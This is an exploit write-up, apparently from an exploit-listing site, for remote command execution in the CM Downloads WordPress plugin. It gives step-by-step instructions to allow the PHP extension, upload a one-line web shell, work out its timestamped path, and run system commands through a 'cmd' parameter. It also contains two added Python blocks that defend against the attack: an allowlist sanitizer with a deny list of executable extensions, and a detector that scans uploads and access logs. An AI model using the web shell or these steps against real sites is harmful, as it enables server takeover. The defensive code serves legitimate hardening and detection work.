## https://sploitus.com/exploit?id=WPEX-ID:D18E695B-4D6E-4FF6-A060-312594A0D2BD
##########################
Activate PHP extension:
##########################
- Log in and go to "CM Downloads" > "Settings" > "General".
- Now you can simply add the php extension to the "Allowed file extensions:" field, because the plugin does not check whether the extensions entered there are server-executable.
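The root cause above is that the extension allowlist is taken from an administrator-controlled setting and never filtered server-side. The following is an added example (not the plugin's own code; all function names are hypothetical) of how such a setting should be handled: executable extensions are stripped from the stored list regardless of what the form submitted, and the upload check inspects the whole extension chain so that names like "shell.php.jpg" or "shell.jpg.php" are refused even when "jpg" is allowed.

```python
"""Hardened handling of an "allowed file extensions" setting.
Added example, not the plugin's code; names are hypothetical."""
import re

# Extensions a typical PHP web server may hand to an interpreter.
# Constructed list: extend it for your own stack (handlers, CGI, etc.).
EXECUTABLE_EXTENSIONS = frozenset({
    "php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar", "phps",
    "inc", "cgi", "pl", "py", "sh", "htaccess",
})


def parse_allowed_extensions(setting):
    """Parse the admin-entered list: comma or whitespace separated,
    with or without leading dots, case-insensitive."""
    items = re.split(r"[,\s]+", setting.strip().lower())
    return {item.lstrip(".") for item in items if item.strip(".")}


def sanitize_allowed_extensions(setting):
    """Return (kept, rejected). Executable extensions are dropped on the
    server side, so a compromised or careless admin account cannot turn
    the download area into a script-execution area."""
    requested = parse_allowed_extensions(setting)
    rejected = requested & EXECUTABLE_EXTENSIONS
    return requested - rejected, rejected


def is_upload_allowed(filename, allowed):
    """Accept a filename only if no part of its extension chain is
    executable and the final extension is in the sanitized allowlist."""
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return False            # no extension at all: refuse
    exts = parts[1:]            # every segment after the first dot
    if any(ext in EXECUTABLE_EXTENSIONS for ext in exts):
        return False            # catches shell.php.jpg and shell.jpg.php
    return exts[-1] in allowed


if __name__ == "__main__":
    kept, dropped = sanitize_allowed_extensions("pdf, zip, .php, PHTML")
    print("kept:", sorted(kept), "rejected:", sorted(dropped))
    for name in ("report.pdf", "malicious_php.php", "x.pdf.php", "x.php.pdf"):
        print(name, "->", is_upload_allowed(name, kept))
```

The point of filtering in `sanitize_allowed_extensions` rather than only in the settings form is that the check survives any client-side bypass of the form; the upload-time check in `is_upload_allowed` is the second, independent layer.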
##################################
Upload our malicious PHP file:
##################################
- Go to "CM Downloads" > "Add New".
- Upload our malicious file, for example malicious_php.php containing:
<?=`$_GET[cmd]`?>
##########################
Find the right path:
##########################
There are two ways to find the path here, because the upload code names the file like this:
$name = time() . '_' . sanitize_file_name($_download_file['name']);
But we don't need to write a script; we can exploit this more easily:
- Go to "CM Downloads" > "CM Downloads".
- Click on "Edit" next to the name we gave our download; we are now redirected to a page.
- We need the id present in the URL, for example http://target/cmdownload/edit/id/7/ => so here it is 7
- We can find the name of our malicious file below the "Browse" button: 1660921772_malicious_php.php
- So now we can execute system commands:
=> target/wp-content/uploads/cmdm/<id>/<filename>
https://target/wp-content/uploads/cmdm/7/1660921772_malicious_php.php?cmd=command
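For defenders, the naming scheme and path above give two reliable detection hooks: uploaded files live under wp-content/uploads/cmdm/<id>/ with a ten-digit epoch prefix, and a request that executes a script from the uploads tree should never happen on a healthy WordPress site. The following added example (not the plugin's or page's own code; sample filenames and access-log lines are constructed, the log format assumed is Apache/nginx "combined") scans an upload listing for server-executable files, recovers the upload time from the prefix for timeline reconstruction, and flags matching requests in a web-server log.

```python
"""Detection helpers for PHP files in the WordPress uploads tree.
Added example, not the plugin's code; sample data is constructed."""
import re
from datetime import datetime, timezone

EXECUTABLE_EXTENSIONS = frozenset({
    "php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar", "phps",
})

# The plugin names uploads time() . '_' . <sanitized name>; match that shape.
CMDM_NAME = re.compile(r"^(?P<ts>\d{10})_(?P<name>.+)$")

# Apache/nginx combined log format; we only need client, method, path, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)
# Any request for a PHP-like file below /wp-content/uploads/, with or without a query string.
UPLOADS_PHP = re.compile(
    r"^/wp-content/uploads/.*\.(?:php\d?|phtml|phar|phps)(?:[/?#]|$)", re.IGNORECASE
)

# Constructed listing of paths relative to wp-content/uploads/.
SAMPLE_UPLOADS = [
    "cmdm/7/1660921772_malicious_php.php",
    "cmdm/6/1660900000_brochure.pdf",
    "2022/08/photo.jpg",
    "cmdm/8/1660930000_archive.zip.phtml",
]

# Constructed access-log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Aug/2022:15:12:01 +0000] "GET /wp-content/uploads/cmdm/7/1660921772_malicious_php.php?cmd=id HTTP/1.1" 200 512 "-" "curl/7.81.0"',
    '198.51.100.7 - - [19/Aug/2022:15:12:05 +0000] "GET /wp-content/uploads/2022/08/report.pdf HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [19/Aug/2022:15:13:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "curl/7.81.0"',
]


def suspicious_uploads(paths):
    """Return upload paths whose extension chain contains an executable extension."""
    hits = []
    for path in paths:
        name = path.rsplit("/", 1)[-1]
        exts = name.lower().split(".")[1:]
        if any(ext in EXECUTABLE_EXTENSIONS for ext in exts):
            hits.append(path)
    return hits


def upload_time(filename):
    """Recover the UTC upload time embedded in a CM Downloads filename, or None."""
    m = CMDM_NAME.match(filename)
    if not m:
        return None
    return datetime.fromtimestamp(int(m.group("ts")), tz=timezone.utc)


def flag_requests(log_lines):
    """Return (client, path, status) for every request that executes a
    script from the uploads tree. Unparseable lines are skipped."""
    flagged = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if m and UPLOADS_PHP.match(m.group("path")):
            flagged.append((m.group("ip"), m.group("path"), m.group("status")))
    return flagged


if __name__ == "__main__":
    for path in suspicious_uploads(SAMPLE_UPLOADS):
        print("executable upload:", path, "uploaded at", upload_time(path.rsplit("/", 1)[-1]))
    for hit in flag_requests(SAMPLE_LOG):
        print("script executed from uploads:", hit)
```

The timestamp recovered by `upload_time` pairs naturally with the first matching request in the log: the gap between the two tells you how quickly the upload was used, and the client address in the flagged request is the pivot for the rest of the investigation. As a mitigation beyond the plugin itself, a web-server rule that refuses to execute any script under wp-content/uploads/ turns every hit from `flag_requests` into a harmless 403.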